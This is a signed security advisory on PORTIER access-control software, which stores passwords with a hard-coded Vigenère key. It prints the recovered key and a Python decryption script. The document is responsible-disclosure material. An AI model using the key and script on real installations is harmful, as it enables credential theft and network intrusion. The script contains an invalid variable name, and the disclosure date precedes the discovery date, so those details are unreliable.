PORTIER versions 4.4.4.2 and 4.4.4.6 allow for decryption of secrets due to static keys.
38727001fe1c552c1264739b429b5d5e
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Advisory ID: SYSS-2018-011
Product: PORTIER
Affected Version(s): 4.4.4.2, 4.4.4.6
Tested Version(s): 4.4.4.2, 4.4.4.6
Vulnerability Type: Cryptographic Issues (CWE-310)
Risk Level: HIGH
Solution Status: Open
Manufacturer Notification: 2018-06-13
Solution Date: -
Public Disclosure: 2018-01-09
CVE Reference: CVE-2019-5723
Author of Advisory: Christian Pappas, SySS GmbH
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
portier vision is a rich client application for managing door keys allocated
to certain persons or group of persons.
The manufacturer describes the product as follows (see [1]):
"portierA(r) vision
* manages locking systems and access rights in a modern and efficient manner
* stores all the details for every single key
* provides you lightning fast with all the information you need in a format
you choose
portier A(r)vision easy - secure - fast, our idea of software."
Passwords are stored encrypted rather than as a hash value and the used
VigenA"re algorithm is badly outdated. Moreover, the keyword is static and quite
too short. Due to this, the passwords stored by the application can be easily
decrypted.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details:
Both user passwords in the database and the password for the database itself
in the 'portiervision.ini' configuration file are stored reversible encrypted.
The enforced password policy requires at least 1 up to 15 character long
passwords.
The passwords are encrypted by a VigenA"re cipher, which is a series of
interwoven Caesar ciphers based on the characters of the keyword. In this
particular application, the keyword is static and 15 bytes long. Static
means, in this special case, hard coded.
Once an attacker has access to the encrypted passwords, he or she can easily
decrypt these and, thereby, escalate his or her privileges. As decrypting the
user passwords the privilege escalation is obviously limited to the
application. But because the same keyword is reused for encrypting the
database password, attackers might go beyond this point and try out these
credentials to take over control of other systems in the corporate network.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof-of-Concept (PoC):
To break the encryption and derive the keyword, the following list of pairs of
plain-text and encrypted passwords is analyzed:
#n plain-text password encrypted password
1 A d
2 AA dI
3 AAA dIo
4 AAAA dIo:
5 AAAAAAAA dIo:iO95
6 AAAAAAAAAAAAAAA dIo:iO95>O1+qtm
7 BBBBBBBBBBBBBBB eJp;jP:6?P2,run
8 CCCCCCCCCCCCCCC fKq<kQ;7@Q3-svo
9 DDDDDDDDDDDDDDD gLr=lR<8AR4.twp
10 YYYYYYYYYYYYYYY !a,R&gQMVgIC.1*
11 ZZZZZZZZZZZZZZZ "b-S'hRNWhJD/2+
12 aaaaaaaaaaaaaaa )i4Z.oYU^oQK692
13 bbbbbbbbbbbbbbb *j5[/pZV_pRL7:3
14 ABCDEFGHIJKLMNO dJq=mT?<FX;6"&
15 ONMLKJIHGFEDCBA rV EsXA<DT5.sum
The length of the encrypted password equals the length of the plain-text
password. Thus, no block ciphers could be in use. Because of an equidistant
offset of the ASCII representation of m consecutive pairs of plain-text and
encrypted passwords, it is assumed that a static key is used. The temporary key
candidate is a list of offsets of the ASCII representation of the encrypted
password in decimal notation:
#n temporary key candidate
6, 7, 8, 9, 15 [-35, -8, -46, 7, -40, -14, 8, 12, 3, -14, 16, 22, -48, -51, -44]
10, 11, 12, 13 [ 56, -8, 45, 7, 51, -14, 8, 12, 3, -14, 16, 22, 43, 40, 47]
14 [-35, -8, -46, 7, -40, -14, 8, 12, 3, -14, 16, 22, 43, 40, 47]
The difference between the offsets of each temporary key candidate to the
others is always 91, so the static key has to be the following:
[-35, -8, -46, 7, -40, -14, 8, 12, 3, -14, 16, 22, -48, -51, -44]
The first printable ASCII character is the space. Its decimal value is 32. But
the application does not accept spaces in the password. Therefore, the
effective first character has the decimal value 33. This results in the
following Python script for decrypting the passwords:
#!/bin/python
import sys
static_key = [-35, -8, -46, 7, -40, -14, 8, 12, 3, -14, 16, 22, -48, -51, -44]
encrypted_password = list(sys.argv[1])
key = static_key[:len(encrypted_password)]
plain-text_password = list()
for i in range(len(encrypted_password)):
decrypted_character = (ord(encrypted_password[i]) - 33 + key[i] + 91) % 91 + 33
plain-text_password.append(chr(decrypted_character))
print("Decrypted password: " + "".join(plain-text_password))
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Solution:
Store user passwords only as a hash value. Therefore, a suitable cryptographic
hashing algorithm like PBKDF2 or bcrypt should be chosen. As it comes to the
implementation, it should be made use of well-known libraries or operating
system services. SySS GmbH is not aware of a solution to the reported security
issue provided by the manufacturer.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclosure Timeline:
2018-05-23: Vulnerability discovered
2018-06-13: Vulnerability reported to manufacturer
2018-01-09: Public disclosure of vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
References:
[1] Product website for PORTIER
https://portier.de/
[2] SySS Security Advisory SYSS-2018-011
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-011.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Credits:
This security vulnerability was found by Christian Pappas of SySS GmbH.
E-Mail: [email protected]
Public Key: ://www.syss.de/fileadmin/dokumente/PGPKeys/Christian_Pappas.asc
Key ID: 0xC5D4E3BA8BA76B25
Key Fingerprint: 5655 FDBE 40DF 0CC4 F143 9877 C5D4 E3BA 8BA7 6B25
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclaimer:
The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS web
site.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright:
Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
iQEzBAEBCgAdFiEEVlX9vkDfDMTxQ5h3xdTjuounayUFAlw18kUACgkQxdTjuoun
ayUWtAgAiFGSaRBx3GA1VCzpKFitumz8kE3lEmvAS8AxL4jXns/Xaa9+U+5lJxCb
Q6TguxeJxBY3ZB4Y4JOWDRlzl5YQxDP0KEa/Z5L4u0Xb1q+2kdSbtN97WheZDwPs
RoB8hJzsEi/a2GcRDmEj/blZmcPdll9L8nRa/vAFTrgkmtS97DEQ3woP6c0P0+sg
AlzD3UVgshB8+ar0IyKiFSht+bDWs5nvyXHPaC+Qc7kokkztHtuorUtbcVjm+W1h
2Seqxa2ad2f766F6pmn+GLehdSl8XFr5fcwqGRMvHv7OgvSL13ID2OXN0uqLy4du
ddVdSLD530mdqs+IXTjCKoflIdnKPg==
=bPfI
-----END PGP SIGNATURE-----